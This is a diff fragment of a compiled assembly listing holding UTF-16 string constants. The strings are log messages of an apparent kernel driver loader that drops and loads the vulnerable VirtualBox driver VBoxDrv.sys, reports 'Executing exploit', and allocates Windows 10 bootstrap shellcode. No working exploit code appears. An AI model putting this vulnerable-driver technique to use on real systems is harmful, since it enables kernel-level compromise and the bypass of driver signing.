+??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'C', 00H, 'a', 00H
+ DB 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'o', 00H, 'p'
+ DB 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H
+ DB 'a', 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, ',', 00H, ' '
+ DB 00H, 'u', 00H, 'n', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H
+ DB ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
+ DB 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H
+ DB 'r', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@
+CONST SEGMENT
+??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
+ DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g'
+ DB 00H, ' ', 00H, 'v', 00H, 'u', 00H, 'l', 00H, 'n', 00H, 'e', 00H
+ DB 'r', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd'
+ DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
+CONST SEGMENT
+??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H
+ DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l'
+ DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
+ DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
+ DB 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'u', 00H
+ DB 'r', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@
+CONST SEGMENT
+??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
+ DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'd', 00H, 'e'
+ DB 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'o', 00H
+ DB 'p', 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i'
+ DB 00H, 'l', 00H, 'u', 00H, 'r', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
+CONST SEGMENT
+??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H
+ DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l'
+ DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
+ DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
+ DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H
+ DB ' ', 00H, 'o', 00H, 'p', 00H, 'e', 00H, 'n', 00H, 'e', 00H, 'd'
+ DB 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@
+CONST SEGMENT
+??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'r', 00H, 'i'
+ DB 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H
+ DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B'
+ DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'o', 00H, 'n', 00H, ' ', 00H
+ DB 'd', 00H, 'i', 00H, 's', 00H, 'k', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@
+CONST SEGMENT
+??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ DB '\'
+ DB 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H
+ DB 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D'
+ DB 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y', 00H, 's', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@
+CONST SEGMENT
+??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'i', 00H
+ DB 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o'
+ DB 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
+ DB 'e', 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k'
+ DB 00H, 'u', 00H, 'p', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'n', 00H
+ DB 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
+CONST SEGMENT
+??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i'
+ DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'i', 00H
+ DB 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't'
+ DB 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H
+ DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r'
+ DB 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H
+ DB 'p', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+CONST SEGMENT
+??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
+ DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
+ DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v'
+ DB 00H, ',', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'n', 00H, 'n', 00H
+ DB 'o', 00H, 't', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'n', 00H, 't'
+ DB 00H, 'i', 00H, 'n', 00H, 'u', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+CONST SEGMENT
+??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
+ DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
+ DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't'
+ DB 00H, 'L', 00H, 'w', 00H, 'f', 00H, ',', 00H, ' ', 00H, 'c', 00H
+ DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c'
+ DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H
+ DB 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@
+CONST SEGMENT
+??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ DB 'V'
+ DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H
+ DB 'L', 00H, 'w', 00H, 'f', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+CONST SEGMENT
+??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
+ DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
+ DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't'
+ DB 00H, 'A', 00H, 'd', 00H, 'p', 00H, ',', 00H, ' ', 00H, 'c', 00H
+ DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c'
+ DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H
+ DB 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@
+CONST SEGMENT
+??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ DB 'V'
+ DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H
+ DB 'A', 00H, 'd', 00H, 'p', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+CONST SEGMENT
+??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
+ DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
+ DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B'
+ DB 00H, 'M', 00H, 'o', 00H, 'n', 00H, ',', 00H, ' ', 00H, 'c', 00H
+ DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c'
+ DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H
+ DB 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@
+CONST SEGMENT
+??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ DB 'V'
+ DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B', 00H
+ DB 'M', 00H, 'o', 00H, 'n', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@
+CONST SEGMENT
+??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'A', 00H, 'c', 00H
+ DB 't', 00H, 'i', 00H, 'v', 00H, 'e', 00H, ' ', 00H, 'V', 00H, 'i'
+ DB 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H
+ DB 'o', 00H, 'x', 00H, ' ', 00H, 'f', 00H, 'o', 00H, 'u', 00H, 'n'
+ DB 00H, 'd', 00H, ' ', 00H, 'i', 00H, 'n', 00H, ' ', 00H, 's', 00H
+ DB 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, ',', 00H, ' '
+ DB 00H, 'a', 00H, 't', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'p', 00H
+ DB 't', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o', 00H, 'p', 00H, ' '
+ DB 00H, '(', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H
+ DB 'd', 00H, ')', 00H, ' ', 00H, 'i', 00H, 't', 00H, ' ', 00H, 'd'
+ DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 's', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@
+CONST SEGMENT
+??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ DB '\', 00H, 'D', 00H
+ DB 'e', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
+CONST SEGMENT
+??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ DB 'V', 00H, 'B', 00H
+ DB 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@
+CONST SEGMENT
+??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'o', 00H, 'p', 00H, 'e'
+ DB 00H, 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'S', 00H
+ DB 'C', 00H, 'M', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H, 'a'
+ DB 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@
+CONST SEGMENT
+??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a'
+ DB 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H
+ DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B'
+ DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H
+ DB 'v', 00H, 'e', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'G', 00H, 'e'
+ DB 00H, 't', 00H, 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H
+ DB 'm', 00H, 'D', 00H, 'i', 00H, 'r', 00H, 'e', 00H, 'c', 00H, 't'
+ DB 00H, 'o', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'f', 00H, 'a', 00H
+ DB 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@
+CONST SEGMENT
+??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H
+ DB 'e', 00H, 'c', 00H, 'u', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g'
+ DB 00H, ' ', 00H, 'e', 00H, 'x', 00H, 'p', 00H, 'l', 00H, 'o', 00H
+ DB 'i', 00H, 't', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@
+CONST SEGMENT
+??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'R', 00H, 'e', 00H
+ DB 's', 00H, 'o', 00H, 'l', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g'
+ DB 00H, ' ', 00H, 'k', 00H, 'e', 00H, 'r', 00H, 'n', 00H, 'e', 00H
+ DB 'l', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'p', 00H, 'o', 00H, 'r'
+ DB 00H, 't', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@
+CONST SEGMENT
+??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H
+ DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, '1'
+ DB 00H, '0', 00H, ' ', 00H, 'R', 00H, 'S', 00H, '2', 00H, '+', 00H
+ DB ' ', 00H, 'b', 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't'
+ DB 00H, 'r', 00H, 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H
+ DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e'
+ DB 00H, ' ', 00H, 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H
+ DB 't', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@
+CONST SEGMENT
+??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H
+ DB 'f', 00H, 'a', 00H, 'u', 00H, 'l', 00H, 't', 00H, ' ', 00H, 'b'
+ DB 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't', 00H, 'r', 00H
+ DB 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H, 'e', 00H, 'l'
+ DB 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H
+ DB 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
+ DB 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@
+CONST SEGMENT
+??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'h', 00H
+ DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e'
+ DB 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H
+ DB 'a', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't'
+ DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@
+CONST SEGMENT
+??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'u', 00H, 'n'
+ DB 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 't', 00H
+ DB 'o', 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c'
+ DB 00H, 'a', 00H, 't', 00H, 'e', 00H, ' ', 00H, 's', 00H, 'h', 00H
+ DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e'
+ DB 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@
+CONST SEGMENT
+??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'Z', 00H, 'w', 00H
+ DB 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, '0'
+ DB 00H, 'x', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@
+CONST SEGMENT
+??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'Z', 00H, 'w'
+ DB 00H, 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H
+ DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's'
+ DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H
+ DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_07IPICGNAN@ZwClose@
+CONST SEGMENT
